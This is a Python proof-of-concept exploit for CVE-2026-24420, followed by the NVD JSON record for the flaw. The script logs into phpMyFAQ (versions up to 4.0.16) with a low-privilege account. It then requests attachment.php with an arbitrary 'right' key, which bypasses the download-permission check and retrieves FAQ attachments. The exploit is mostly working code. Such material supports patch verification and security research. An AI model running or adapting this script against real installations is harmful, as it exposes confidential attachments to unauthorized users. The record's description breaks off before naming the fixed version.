CVE-2026-24420

import requests # CVE-2026-24420 PoC - phpMyFAQ Attachment Download Authorization Bypass # Target: phpMyFAQ <= 4.0.16 # Vulnerability: Insecure permission check in attachment.php allows authenticated users # without dlattachment permission to download FAQ attachments TARGET_URL = "http://target-server/phpmyfaq" LOGIN_URL = f"{TARGET_URL}/login.php" ATTACHMENT_URL = f"{TARGET_URL}/attachment.php" session = requests.Session() # Step 1: Authenticate with a low-privilege account (without dlattachment permission) login_data = { "user": "low_privilege_user", "password": "user_password", "action": "login" } response = session.post(LOGIN_URL, data=login_data) # Step 2: Exploit the authorization bypass # The vulnerable code checks for a right key existence instead of proper permission verification # Send request to download attachment without having dlattachment permission attachment_params = { "id": "attachment_file_id", # Target attachment ID "right": "some_existing_right_key" # Any valid right key bypasses the check } response = session.get(ATTACHMENT_URL, params=attachment_params) # If successful, the attachment content will be returned if response.status_code == 200 and response.headers.get('Content-Type') != 'text/html': print(f"[+] Successfully downloaded attachment: {len(response.content)} bytes") else: print("[-] Exploitation failed")

{"cve": {"id": "CVE-2026-24420", "sourceIdentifier": "[email protected]", "published": "2026-01-24T03:16:00.760", "lastModified": "2026-01-28T18:25:46.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpMyFAQ is an open source FAQ web application. Versions 4.0.16 and below allow an authenticated user without the dlattachment permission to download FAQ attachments due to a incomprehensive permissions check. The presence of a right key is improperly validated as proof of authorization in attachment.php. Additionally, the group and user permission logic contains a flawed conditional expression that may allow unauthorized access. This issue has been fixed in version"}, {"lang": "es", "value": "phpMyFAQ es una aplicación web de FAQ de código abierto. Las versiones 4.0.16 e inferiores permiten a un usuario autenticado sin el permiso dlattachment descargar archivos adjuntos de FAQ debido a una verificación de permisos incompleta. La presencia de una clave correcta se valida incorrectamente como prueba de autorización en attachment.php. Además, la lógica de permisos de grupo y usuario contiene una expresión condicional defectuosa que puede permitir el acceso no autorizado. Este problema ha sido solucionado en la versión"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.0.17", "matchCriteriaId": "8A48918B-2C09-403F-A8A5-8179AE32363E"}]}]}], "references": [{"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-7p9h-m7m8-vhhv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}